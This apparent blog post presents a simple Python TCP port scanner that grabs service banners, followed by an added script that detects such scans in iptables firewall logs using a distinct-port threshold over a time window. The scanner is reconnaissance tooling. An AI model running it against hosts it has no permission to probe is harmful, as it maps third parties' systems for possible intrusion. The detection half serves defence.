The instructions are simple. Just run “python simpleportscanner.py” and it will prompt for an IP address. As written, it scans a fixed list of TCP ports. Edit the code to scan the ports you desire, or enter ports on the CLI.

#!/usr/bin/env python
# Runs under Python 2 or 3
from __future__ import print_function
import socket
import sys
from multiprocessing.dummy import Pool as ThreadPool
from datetime import datetime

# raw_input() only exists on Python 2; fall back to input() on Python 3
try:
    read_line = raw_input
except NameError:
    read_line = input

# Ask for input
remoteServer = read_line("Enter a remote host to scan: ")
remoteServerIP = socket.gethostbyname(remoteServer)

# Print a nice banner with information on which host we are about to scan
print("-" * 60)
print("Please wait, scanning remote host", remoteServerIP)
print("-" * 60)

# Check what time the scan started
t1 = datetime.now()

def scan(port):
    # One TCP connect per port. Without a timeout a filtered port (no SYN/ACK,
    # no RST) or a silent service would block the worker thread indefinitely.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(3)
    result = sock.connect_ex((remoteServerIP, port))
    if result == 0:
        banner = b""
        try:
            # Send a line to provoke a reply, then read whatever the service says
            sock.send(b"Server:\r\n")
            banner = sock.recv(1024)
        except socket.error:
            # Timed out, or the service closed the connection without a banner
            pass
        print("Port {}: Open".format(port), " - ", banner.strip())
    sock.close()

# function to be mapped over the port list by a small thread pool
def scanParallel(ports, threads=4):
    pool = ThreadPool(threads)
    results = pool.map(scan, ports)
    pool.close()
    pool.join()
    return results

if __name__ == "__main__":
    # Default port list; override it with a comma-separated list on the
    # command line, e.g. python simpleportscanner.py 22,80,443
    ports = (20,21,22,23,53,69,80,88,110,123,135,137,138,139,143,161,389,443,445,464,512,513,631,860,1080,1433,1434,3124,3128,3306,3389,5800,5900,8080,10000)
    if len(sys.argv) > 1:
        ports = tuple(int(p) for p in sys.argv[1].split(","))
    results = scanParallel(ports, 4)

    # Checking the time again
    t2 = datetime.now()

    # Calculates the difference of time, to see how long it took to run the script
    total = t2 - t1

    # Printing the information to screen
    print('Scanning Completed in: ', total)

Get the code: https://raw.githubusercontent.com/sdcampbell/simpleportscanner/master/simpleportscanner.py
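Seen from the other side, a scan like this is easy to pick out of a host firewall log: one source touching many destination ports on one host within a few seconds, with the four worker threads showing up as a burst of connects with different source ports. The added example below (my code, not part of the original post) parses iptables LOG lines, which carry SRC=, DST=, PROTO= and DPT= fields, and flags any source/destination pair that exceeds a distinct-port threshold inside a sliding time window. The log lines are constructed, and since the syslog timestamp carries no year the code assumes 2016.

```python
#!/usr/bin/env python3
"""Flag TCP connect scans in iptables LOG output.  Added example; the log
lines are constructed and the year is an assumption (syslog omits it)."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample from a LOG rule on 10.0.0.10 that records inbound SYNs.
# 198.51.100.7 walks a dozen ports in three seconds; 192.0.2.20 just uses
# the web server and makes one DNS query.
SAMPLE_LOG = """\
Oct 28 10:52:01 host kernel: [1234.001] FW-IN: IN=eth0 OUT= SRC=192.0.2.20 DST=10.0.0.10 PROTO=TCP SPT=50100 DPT=443 SYN
Oct 28 10:52:02 host kernel: [1235.002] FW-IN: IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.10 PROTO=TCP SPT=40001 DPT=21 SYN
Oct 28 10:52:02 host kernel: [1235.003] FW-IN: IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.10 PROTO=TCP SPT=40002 DPT=22 SYN
Oct 28 10:52:02 host kernel: [1235.004] FW-IN: IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.10 PROTO=TCP SPT=40003 DPT=23 SYN
Oct 28 10:52:02 host kernel: [1235.005] FW-IN: IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.10 PROTO=TCP SPT=40004 DPT=25 SYN
Oct 28 10:52:03 host kernel: [1236.001] FW-IN: IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.10 PROTO=TCP SPT=40005 DPT=53 SYN
Oct 28 10:52:03 host kernel: [1236.002] FW-IN: IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.10 PROTO=TCP SPT=40006 DPT=80 SYN
Oct 28 10:52:03 host kernel: [1236.003] FW-IN: IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.10 PROTO=TCP SPT=40007 DPT=110 SYN
Oct 28 10:52:03 host kernel: [1236.004] FW-IN: IN=eth0 OUT= SRC=192.0.2.20 DST=10.0.0.10 PROTO=TCP SPT=50101 DPT=443 SYN
Oct 28 10:52:03 host kernel: [1236.005] FW-IN: IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.10 PROTO=TCP SPT=40008 DPT=135 SYN
Oct 28 10:52:04 host kernel: [1237.001] FW-IN: IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.10 PROTO=TCP SPT=40009 DPT=139 SYN
Oct 28 10:52:04 host kernel: [1237.002] FW-IN: IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.10 PROTO=TCP SPT=40010 DPT=443 SYN
Oct 28 10:52:04 host kernel: [1237.003] FW-IN: IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.10 PROTO=TCP SPT=40011 DPT=445 SYN
Oct 28 10:52:04 host kernel: [1237.004] FW-IN: IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.10 PROTO=TCP SPT=40012 DPT=3389 SYN
Oct 28 10:52:09 host kernel: [1242.001] FW-IN: IN=eth0 OUT= SRC=192.0.2.20 DST=10.0.0.10 PROTO=TCP SPT=50102 DPT=80 SYN
Oct 28 10:52:15 host kernel: [1248.001] FW-IN: IN=eth0 OUT= SRC=192.0.2.20 DST=10.0.0.10 PROTO=UDP SPT=50103 DPT=53
"""

# Syslog timestamp at the start, then the netfilter KEY=value fields we need.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) .*?"
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?PROTO=(?P<proto>\S+) .*?DPT=(?P<dpt>\d+)"
)


def parse_line(line, year=2016):
    """Return a dict for a LOG line, or None for lines that are not LOG entries."""
    m = LINE_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S").replace(year=year)
    return {"time": ts, "src": m.group("src"), "dst": m.group("dst"),
            "proto": m.group("proto"), "dport": int(m.group("dpt"))}


def detect_scans(lines, window_seconds=10, min_ports=8):
    """Return {(src, dst): sorted distinct ports} for every pair that hits at
    least min_ports distinct TCP ports inside any window_seconds-wide window."""
    events = [e for e in (parse_line(l) for l in lines) if e and e["proto"] == "TCP"]
    events.sort(key=lambda e: e["time"])
    by_pair = defaultdict(list)
    for e in events:
        by_pair[(e["src"], e["dst"])].append(e)

    alerts = {}
    for pair, evs in by_pair.items():
        start = 0
        for end, e in enumerate(evs):
            # Slide the window start forward until it fits window_seconds
            while (e["time"] - evs[start]["time"]).total_seconds() > window_seconds:
                start += 1
            ports = {x["dport"] for x in evs[start:end + 1]}
            if len(ports) >= min_ports:
                alerts[pair] = sorted({x["dport"] for x in evs})
                break  # one alert per pair; report everything it touched
    return alerts


if __name__ == "__main__":
    for (src, dst), ports in detect_scans(SAMPLE_LOG.splitlines()).items():
        print("possible scan: %s -> %s, %d ports: %s" % (src, dst, len(ports), ports))
```

The threshold and window are the knobs to tune: the scanner above fires 35 connects in well under ten seconds, so eight distinct ports in ten seconds catches it comfortably while a browser talking to 80 and 443 never trips it. Slow scans spread over minutes need a longer window, and a busy server will want the check keyed per source across all destinations as well.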